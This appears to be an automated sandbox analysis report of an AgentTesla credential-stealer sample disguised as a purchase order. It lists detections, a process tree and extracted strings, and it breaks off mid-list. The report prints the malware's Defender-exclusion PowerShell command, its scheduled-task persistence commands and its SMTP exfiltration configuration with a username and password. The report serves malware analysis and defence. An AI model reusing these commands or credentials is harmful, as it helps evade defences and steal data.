Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase order 450080088 proj. Allt Charnan.exe

Overview

General Information

Sample Name:Purchase order 450080088 proj. Allt Charnan.exe
Analysis ID:626538
MD5:152ef22896bf39197d210d40171e898a
SHA1:bdd88e03d9131d7f35e0bfadbed02010d231a1bd
SHA256:5a3834895f08aff701a029275074d4ab47aff4951d6f75e8393b0a97cb8f6031
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Creates processes with suspicious names
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Purchase order 450080088 proj. Allt Charnan.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe" MD5: 152EF22896BF39197D210D40171E898A)
    • powershell.exe (PID: 6948 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6964 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • jVULYR.exe (PID: 7076 cmdline: "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe" MD5: 152EF22896BF39197D210D40171E898A)
    • schtasks.exe (PID: 7060 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • jVULYR.exe (PID: 6676 cmdline: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe MD5: 152EF22896BF39197D210D40171E898A)
  • jVULYR.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe" MD5: 152EF22896BF39197D210D40171E898A)
    • schtasks.exe (PID: 6952 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • jVULYR.exe (PID: 5908 cmdline: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe MD5: 152EF22896BF39197D210D40171E898A)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "aborderias@transmase.com", "Password": "pass@111", "Host": "smtp.transmase.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 58 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32bef:$s10: logins
                • 0x32656:$s11: credential
                • 0x2ec24:$g1: get_Clipboard
                • 0x2ec32:$g2: get_Keyboard
                • 0x2ec3f:$g3: get_Password
                • 0x2ff1c:$g4: get_CtrlKeyDown
                • 0x2ff2c:$g5: get_ShiftKeyDown
                • 0x2ff3d:$g6: get_AltKeyDown
                25.2.jVULYR.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  25.2.jVULYR.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 106 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 29.0.jVULYR.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "aborderias@transmase.com", "Password": "pass@111", "Host": "smtp.transmase.com"}
                    Multi AV Scanner detection for submitted file
                    Source: Purchase order 450080088 proj. Allt Charnan.exeVirustotal: Detection: 37%Perma Link
                    Source: Purchase order 450080088 proj. Allt Charnan.exeReversingLabs: Detection: 61%
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\NpPgfycY.exeReversingLabs: Detection: 61%
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeReversingLabs: Detection: 61%
                    Machine Learning detection for sample
                    Source: Purchase order 450080088 proj. Allt Charnan.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\NpPgfycY.exeJoe Sandbox ML: detected
                    Source: 29.0.jVULYR.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 25.2.jVULYR.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 29.0.jVULYR.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 29.2.jVULYR.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 25.0.jVULYR.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 25.0.jVULYR.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 25.0.jVULYR.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 25.0.jVULYR.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 29.0.jVULYR.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 29.0.jVULYR.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 29.0.jVULYR.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 25.0.jVULYR.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: SZArrayEnumera.pdb source: jVULYR.exe, jVULYR.exe, 00000019.00000000.348771513.00000000009B2000.00000002.00000001.01000000.00000009.sdmp, jVULYR.exe, 0000001D.00000000.371444039.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, jVULYR.exe.9.dr, NpPgfycY.exe.0.dr
                    Source: global trafficTCP traffic: 192.168.2.3:49747 -> 208.91.198.38:587
                    Source: global trafficTCP traffic: 192.168.2.3:49752 -> 162.222.225.16:587
                    Source: global trafficTCP traffic: 192.168.2.3:49747 -> 208.91.198.38:587
                    Source: global trafficTCP traffic: 192.168.2.3:49752 -> 162.222.225.16:587
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: jVULYR.exe, 0000001D.00000002.520269819.000000000316E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000003.480252697.0000000000D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2FcFU77ZypH.org
                    Source: jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://TwQUlE.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244802747.0000000005E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519099942.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519288235.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.520008150.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.519797643.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520534688.000000000318E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520325574.0000000003176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.transmase.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519099942.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519288235.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.520008150.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.519797643.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520534688.000000000318E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520325574.0000000003176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com7
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comaL
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comceu
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomd
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comh
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comiona
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comituL
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commS
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246509021.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246509021.0000000005E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn:
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnaiL
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cne-d
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cng
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn~
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255349808.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255002822.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.254913650.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255131346.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255062247.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/E
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244343928.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244364704.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 